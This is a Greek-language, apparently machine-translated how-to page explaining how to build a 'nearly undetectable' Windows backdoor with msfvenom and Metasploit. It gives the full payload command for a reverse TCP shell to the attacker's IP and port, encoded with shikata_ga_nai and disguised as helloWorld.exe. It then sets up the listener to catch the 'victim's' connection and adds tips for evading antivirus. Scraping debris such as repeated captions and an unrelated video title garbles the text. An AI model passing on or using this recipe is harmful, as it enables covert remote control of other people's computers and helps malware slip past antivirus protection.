Πώς να δημιουργήσετε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux

Πίνακας περιεχομένων:

Πώς να δημιουργήσετε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux
Πώς να δημιουργήσετε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux

Βίντεο: Πώς να δημιουργήσετε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux

Βίντεο: Πώς να δημιουργήσετε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux
Βίντεο: Η ΣΤΡΑΤΗΓΙΚΗ ΣΤΟ CLASH OF CLANS - GREECE CHANNEL - ΕΠΕΙΣΟΔΙΟ 2 2024, Ενδέχεται
Anonim

Μια πίσω πόρτα χρησιμοποιείται για να παρακάμψει τους μηχανισμούς ασφαλείας, συχνά κρυφά και κυρίως μη ανιχνεύσιμα. Χρησιμοποιώντας το MSFvenom, το συνδυασμό msfpayload και msfencode, είναι δυνατό να δημιουργήσετε μια πίσω πόρτα που συνδέεται πίσω με τον εισβολέα χρησιμοποιώντας αντίστροφο κέλυφος TCP. Για να αναπτύξετε μια πίσω πόρτα, πρέπει να αλλάξετε την υπογραφή του κακόβουλου λογισμικού σας για να αποφύγετε οποιοδήποτε λογισμικό προστασίας από ιούς. Ολοκληρώστε αυτό το έργο σε ένα ζευγάρι υπολογιστών στους οποίους έχετε άδεια πρόσβασης και στην πορεία, θα μάθετε περισσότερα σχετικά με την ασφάλεια των υπολογιστών και πώς λειτουργεί αυτό το είδος της πίσω πόρτας.

Βήματα

Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 1
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 1

Βήμα 1. Εκκινήστε το Kali και ενεργοποιήστε την κονσόλα Terminal

Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 2
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 2

Βήμα 2. Πληκτρολογήστε ifconfig για να εμφανίσετε τη διεπαφή και ελέγξτε τη διεύθυνση IP σας

Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 3
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 3

Βήμα 3. Πληκτρολογήστε κωδικοποιητές msfvenom -l για να εμφανιστεί η λίστα των κωδικοποιητών

Ως κωδικοποιητής θα χρησιμοποιήσετε το x86/shikata_ga_nai

Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 4
Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 4

Βήμα 4. Πληκτρολογήστε "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 --πλατφόρμα παράθυρα ορίζει αρχιτεκτονική προς χρήση.
  • -p windows/shell/reverse_tcp ορίζει το ωφέλιμο φορτίο για ενσωμάτωση.
  • Το LHOST ορίζει τη διεύθυνση IP του ακροατή.
  • Το LPORT ορίζει τη θύρα ακρόασης.
  • -b "\ x00" ορίζει την αποφυγή κακού χαρακτήρα (null bytes).
  • -e x86/shikata_ga_nai ορίζει το όνομα κωδικοποιητή.
  • -f exe> helloWorld.exe ορίζει έξοδο μορφής.
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 5
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 5

Βήμα 5. Πληκτρολογήστε msfconsole για να ενεργοποιήσετε το Metasploit

Τώρα έχετε δημιουργήσει την πίσω πόρτα σας. Όταν το θύμα κάνει κλικ στο helloWorld.exe, το ωφέλιμο φορτίο του κελύφους που είναι ενσωματωμένο θα ενεργοποιηθεί και θα κάνει μια σύνδεση πίσω στο σύστημά σας. Για να λάβετε τη σύνδεση, πρέπει να ανοίξετε το πολυ-χειριστή στο Metasploit και να ορίσετε το ωφέλιμο φορτίο

Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 6
Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 6

Βήμα 6. Πληκτρολογήστε use exploit/multi/handler

Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 7
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 7

Βήμα 7. Πληκτρολογήστε set payload windows/shell/reverse_tcp

Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 8
Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 8

Βήμα 8. Πληκτρολογήστε επιλογές εμφάνισης για να ελέγξετε τη μονάδα

Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 9
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 9

Βήμα 9. Πληκτρολογήστε το σύνολο LHOST 192.168.48.129

Το "LHOST" ορίζει τη διεύθυνση IP του ακροατή

Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 10
Δημιουργήστε μια σχεδόν μη ανιχνεύσιμη πίσω πόρτα χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 10

Βήμα 10. Πληκτρολογήστε σύνολο LPORT 4444

Το "LPORT" ορίζει τη θύρα ακρόασης

Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 11
Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 11

Βήμα 11. Πληκτρολογήστε εκτέλεση και περιμένετε τη σύνδεση από το μηχάνημα του θύματος

Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 12
Δημιουργήστε ένα σχεδόν μη ανιχνεύσιμο Backdoor χρησιμοποιώντας το MSFvenom στο Kali Linux Βήμα 12

Βήμα 12. Περιμένετε να κάνει κλικ το θύμα στο helloWorld.exe

Στη συνέχεια, θα συνδεθείτε επιτυχώς με τη μηχανή του θύματος.

Συμβουλές

  • Η χρήση του -i στο MSFvenom θα αντιπροσωπεύει τις επαναλήψεις της κωδικοποίησης. Μερικές φορές περισσότερες επαναλήψεις μπορεί να βοηθήσουν στην αποφυγή του λογισμικού AV.
  • Έχετε μάθει πώς να δημιουργείτε την πίσω πόρτα και να κωδικοποιείτε χρησιμοποιώντας το MSFvenom, αλλά αυτή η μέθοδος δεν θα λειτουργήσει τέλεια ενάντια σε ορισμένα από τα λογισμικά AV στις μέρες μας. Ο λόγος πίσω από αυτό είναι τα πρότυπα εκτέλεσης στο MSFvenom. Οι προμηθευτές AV έχουν προσθέσει τη στατική υπογραφή αυτών των προτύπων και απλά τα αναζητούν. Η λύση για αυτό το ζήτημα είναι να χρησιμοποιήσετε διαφορετικό πρότυπο εκτέλεσης ή διαφορετικά εργαλεία.

Συνιστάται: